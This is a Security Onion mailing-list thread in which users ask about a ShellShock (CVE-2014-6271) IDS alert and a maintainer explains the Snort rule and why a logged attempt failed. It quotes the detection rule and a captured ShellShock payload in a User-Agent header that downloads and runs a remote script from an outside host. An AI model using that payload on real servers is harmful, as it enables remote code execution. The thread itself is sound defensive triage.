ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers error
1,635 views
Skip to first unread message
Donato Donatello
Sep 25, 2014, 10:34:00 AM9/25/14
to securit...@googlegroups.com
I get this error nowadays. Could anyone explain this alert to me?
Src and Dst ips are the physical machines on which the servers are running.
On these machines VMware is set and all system servers are configured to run on this virtual machine. Sometimes the processes migrates from one to another and alot of false positives occured then. But I suspect this error and want to hear any helpful advice.
Thanks;
Doug Burks
Sep 25, 2014, 10:46:56 AM9/25/14
to securit...@googlegroups.com
Hi Donato,
Replies inline.
On Thu, Sep 25, 2014 at 10:34 AM, Donato Donatello
<someoned...@gmail.com> wrote:
> I get this error nowadays.
What do you mean by "error"? Do you mean "alert"?
> Could anyone explain this alert to me?
This alert is related to the bash vulnerability I blogged about yesterday:
http://blog.securityonion.net/2014/09/bash-vulnerability.html
Emerging Threats released rules to detect possible attempts:
http://emergingthreats.net/daily-ruleset-update-summary-09242014/
Here is the specific rule you're referring to:
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER
Possible CVE-2014-6271 Attempt in Headers";
flow:established,to_server; content:"|28 29 20 7b 20|"; http_header;
fast_pattern:only;
reference:url,blogs.akamai.com/2014/09/environment-bashing.html;
classtype:attempted-admin; sid:2019232; rev:2;)
> Src and Dst ips are the physical machines on which the servers are running.
What "servers"? Your Security Onion servers? Are these servers
exposed to the Internet?
> On these machines VMware is set and all system servers are configured to run on this virtual machine. Sometimes the processes migrates from one to another and alot of false positives occured then. But I suspect this error and want to hear any helpful advice.
You should pivot from the alert to pcap/transcript to determine if
this is something that you need to be concerned about or if this is
potentially a false positive.
--
Doug Burks
Need Security Onion Training or Commercial Support?
http://securityonionsolutions.com
Replies inline.
On Thu, Sep 25, 2014 at 10:34 AM, Donato Donatello
<someoned...@gmail.com> wrote:
> I get this error nowadays.
> Could anyone explain this alert to me?
http://blog.securityonion.net/2014/09/bash-vulnerability.html
Emerging Threats released rules to detect possible attempts:
http://emergingthreats.net/daily-ruleset-update-summary-09242014/
Here is the specific rule you're referring to:
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER
Possible CVE-2014-6271 Attempt in Headers";
flow:established,to_server; content:"|28 29 20 7b 20|"; http_header;
fast_pattern:only;
reference:url,blogs.akamai.com/2014/09/environment-bashing.html;
classtype:attempted-admin; sid:2019232; rev:2;)
> Src and Dst ips are the physical machines on which the servers are running.
exposed to the Internet?
> On these machines VMware is set and all system servers are configured to run on this virtual machine. Sometimes the processes migrates from one to another and alot of false positives occured then. But I suspect this error and want to hear any helpful advice.
this is something that you need to be concerned about or if this is
potentially a false positive.
--
Doug Burks
Need Security Onion Training or Commercial Support?
http://securityonionsolutions.com
Juanma Lainez
Mar 6, 2015, 2:06:13 PM3/6/15
to securit...@googlegroups.com
First gazillion thanks for so awesome work!!!! I am learning a lot from it, now to the point.
I have received an alert from the same rule than Donato, I have pivoted from Snorby to Sguill and reviewed the payload, pcap with wireshark, the Bro transcript, etc..
I am a little concern with the payload, looks like my webserver has been tried to or successfully used for getting something from another host, possibly 64.32.12.152
I have gathered info from both the possible source of this payload and the ip from above
From the capme file this is the part that I do not like at all:
--------------------
Src IP: 31.184.194.114 (Unknown)
Src Port: 54904
Dst Port: 80
OS Fingerprint: 31.184.194.114:54904 - UNKNOWN [S20:56:1:60:M1460,S,T,N,W7:.:?:?] (up: 911 hrs)
"...SRC: GET /cgi-bin/cgi.cgi HTTP/1.1
SRC: Accept: */*
SRC: Accept-Language: en-us
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*");'
SRC: Host: 151.224.41.41
SRC: Connection: Close
SRC:
SRC:
DST: HTTP/1.1 404 Not Found
DST: Content-Type: text/html; charset=us-ascii
DST: Server: Microsoft-HTTPAPI/2.0
DST: Date: Fri, 06 Mar 2015 17:17:09 GMT
DST: Connection: close
DST: Content-Length: 315
DST:
DST: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
DST: <HTML><HEAD><TITLE>Not Found</TITLE>
DST: <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
DST: <BODY><h2>Not Found</h2>
DST: <hr><p>HTTP Error 404. The requested resource is not found.</p>
DST: </BODY></HTML>"
--------------------
Any thoughts?
Doug Burks
Mar 6, 2015, 4:50:30 PM3/6/15
to securit...@googlegroups.com
Hi Juanma,
Public facing web servers see lots of ShellShock attempts like this.
However, just because you're seeing *attempts* doesn't actually mean
that those attempts succeeded. Looks like the ShellShock scanner did
an HTTP GET request for /cgi-bin/cgi.cgi, which doesn't exist on your
web server (which is why it then responded with "404 Not Found"
instead of "SUCCESS!" as shown in the GET request). If you don't have
machines in your environment that are vulnerable to
CVE-2014-6271/CVE-2014-7169, then you may want to simply disable this
particular rule.
You may also be interested in the Bro ShellShock script which detects
ShellShock attempts that actually succeeded:
http://blog.securityonion.net/2014/10/new-securityonion-bro-scripts-and.html
> --
> You received this message because you are subscribed to the Google Groups "security-onion" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to security-onio...@googlegroups.com.
> To post to this group, send email to securit...@googlegroups.com.
> Visit this group at http://groups.google.com/group/security-onion.
> For more options, visit https://groups.google.com/d/optout.
Public facing web servers see lots of ShellShock attempts like this.
However, just because you're seeing *attempts* doesn't actually mean
that those attempts succeeded. Looks like the ShellShock scanner did
an HTTP GET request for /cgi-bin/cgi.cgi, which doesn't exist on your
web server (which is why it then responded with "404 Not Found"
instead of "SUCCESS!" as shown in the GET request). If you don't have
machines in your environment that are vulnerable to
CVE-2014-6271/CVE-2014-7169, then you may want to simply disable this
particular rule.
You may also be interested in the Bro ShellShock script which detects
ShellShock attempts that actually succeeded:
http://blog.securityonion.net/2014/10/new-securityonion-bro-scripts-and.html
> You received this message because you are subscribed to the Google Groups "security-onion" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to security-onio...@googlegroups.com.
> To post to this group, send email to securit...@googlegroups.com.
> Visit this group at http://groups.google.com/group/security-onion.
> For more options, visit https://groups.google.com/d/optout.
Juanma Lainez
Mar 6, 2015, 6:51:44 PM3/6/15
to securit...@googlegroups.com
Kindest Regards
Juan
Reply all
Reply to author
Forward
0 new messages